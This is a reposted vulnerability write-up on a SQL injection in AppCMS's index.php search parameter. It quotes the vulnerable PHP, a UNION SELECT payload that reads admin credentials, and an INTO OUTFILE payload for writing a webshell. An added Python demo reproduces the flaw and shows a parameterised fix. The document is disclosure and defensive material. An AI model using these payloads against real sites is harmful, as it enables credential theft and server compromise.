AppCMS homepage SQL injection vulnerability

Posted by 颓废, 2019-05-19 09:27:16. 478 views, 880 characters, about a 3-minute read.
Summary

The app-search branch of index.php splices the trimmed `q` parameter straight into a `LIKE '%...%'` pattern and returns the matching rows as JSON. Because the input is neither bound nor escaped, an attacker can close the quoted pattern, append a `UNION SELECT` to read the `appcms_admin_list` credentials, and, where the MySQL account has file privileges, use `INTO OUTFILE` to write a file under the web root.

index.php

    if (trim($_GET['q']) != '' && !isset($_GET['tpl'])) {
        $str = '';
        // trim($_GET['q']) is concatenated into the LIKE pattern with no escaping or parameter binding
        $sql = "SELECT app_id,app_title,app_down FROM " . TB_PREFIX . "app_list WHERE app_title LIKE '%" . trim($_GET['q']) . "%' LIMIT 15";
        $app_list = $dbm->query($sql);
        if (count($app_list['list']) > 0) {
            foreach ($app_list['list'] as $k => $v) {
                // only app_title is cut to 20 characters; app_id and app_down are returned as stored
                $app_list['list'][$k]['app_title'] = helper::utf8_substr($v['app_title'], 0, 20);
            }
            echo json_encode($app_list['list']);
            exit;
        } else {
            exit;
        }
    }

$_GET['q'] goes straight into the query.
Payload:

q=1%'union select 1,uname,upass from appcms_admin_list %23

`1%'` closes the opening `'%` so the LIKE clause is syntactically complete, `#` (URL-encoded as %23) comments out the rest of the original statement, and the UNION SELECT appends rows from the admin table. The union must supply the same three columns as the original SELECT; uname comes back in the app_title field (cut to 20 characters by utf8_substr) and upass in app_down, untouched.
The SQL statement becomes (TB_PREFIX resolved to `appcms_`, consistent with the `appcms_admin_list` table named in the payload):

SELECT app_id,app_title,app_down FROM appcms_app_list WHERE app_title LIKE '%1%'union select 1,uname,upass from appcms_admin_list #%' LIMIT 15

Writing a shell (the `'aaa'` in the payload stands in for the file contents; a working webshell needs PHP code there. `INTO OUTFILE` only succeeds when the MySQL account has the FILE privilege, `secure_file_priv` permits the target directory, the MySQL server shares a host with the web root, and the target file does not already exist, since MySQL refuses to overwrite):

q=1%'union select 1,2,'aaa'  into outfile 'D://WWW//a.php' %23

The statement becomes (again with TB_PREFIX resolved to `appcms_`):

SELECT app_id,app_title,app_down FROM appcms_app_list WHERE app_title LIKE '%1%'union select 1,2,'aaa' into outfile 'D://WWW//a.php' #%' LIMIT 15
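As an added illustration (this is not code from the post or from AppCMS), the script below rebuilds the vulnerable query construction in Python against an in-memory SQLite copy of the two tables, runs the post's union payload through it, and then shows the same search done with a bound parameter plus LIKE-wildcard escaping, the fix a maintainer would apply. The table contents, the `appcms_` prefix and the hash value are constructed for the demo. SQLite has no `#` comment, so the payload ends in `-- -` (MySQL needs a space after `--`, and trim() would strip a trailing one); the INTO OUTFILE step is MySQL-specific and is not reproduced.

```python
import sqlite3

# Constructed stand-in for the two AppCMS tables the query touches; not the real schema.
TB_PREFIX = "appcms_"  # assumption: matches the appcms_admin_list name used in the payload


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript(f"""
        CREATE TABLE {TB_PREFIX}app_list (app_id INTEGER, app_title TEXT, app_down TEXT);
        CREATE TABLE {TB_PREFIX}admin_list (uname TEXT, upass TEXT);
        INSERT INTO {TB_PREFIX}app_list VALUES
            (1, 'Notepad 100% free', '/dl/1'),
            (2, 'Calculator', '/dl/2'),
            (3, 'Music player', '/dl/3');
        INSERT INTO {TB_PREFIX}admin_list VALUES
            ('admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return con


def to_json_rows(rows):
    # Mirrors the PHP loop: app_title cut to 20 chars, app_down passed through untouched.
    return [{"app_id": r[0], "app_title": r[1][:20], "app_down": r[2]} for r in rows]


def search_vulnerable(con, q):
    # Same construction as index.php: trim()'d input spliced into the LIKE pattern.
    sql = (f"SELECT app_id,app_title,app_down FROM {TB_PREFIX}app_list "
           f"WHERE app_title LIKE '%{q.strip()}%' LIMIT 15")
    return to_json_rows(con.execute(sql).fetchall())


def escape_like(s, esc="\\"):
    # Escape the ESCAPE char first, then the LIKE wildcards, so input matches literally.
    return (s.replace(esc, esc + esc)
             .replace("%", esc + "%")
             .replace("_", esc + "_"))


def search_fixed(con, q):
    # Bound parameter: the pattern travels as data, so a quote in it cannot end the literal.
    # ESCAPE makes a user-typed % or _ match itself instead of acting as a wildcard.
    pattern = "%" + escape_like(q.strip()) + "%"
    sql = (f"SELECT app_id,app_title,app_down FROM {TB_PREFIX}app_list "
           f"WHERE app_title LIKE ? ESCAPE '\\' LIMIT 15")
    return to_json_rows(con.execute(sql, (pattern,)).fetchall())


# The post's payload with "-- -" in place of "#" (see the note above the block).
PAYLOAD = "1%' union select 1,uname,upass from appcms_admin_list -- -"


if __name__ == "__main__":
    con = build_db()
    print("vulnerable:", search_vulnerable(con, PAYLOAD))  # admin hash appears in app_down
    print("fixed:", search_fixed(con, PAYLOAD))            # no title contains that literal text
    print("fixed, q=100%:", search_fixed(con, "100%"))    # only the title containing "100%"
```

Besides blocking the union, `search_fixed` also closes the quieter wildcard problem: `q=%` against the original code matches every row, while the escaped version returns only titles that literally contain a percent sign.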

Author: p0

Published by 颓废 on 2019-05-19 09:27:16. When reposting, keep the original link (CN-SEC 中文网, with thanks to the original author): appcms 主页注入漏洞, http://cn-sec.com/archives/68205.html
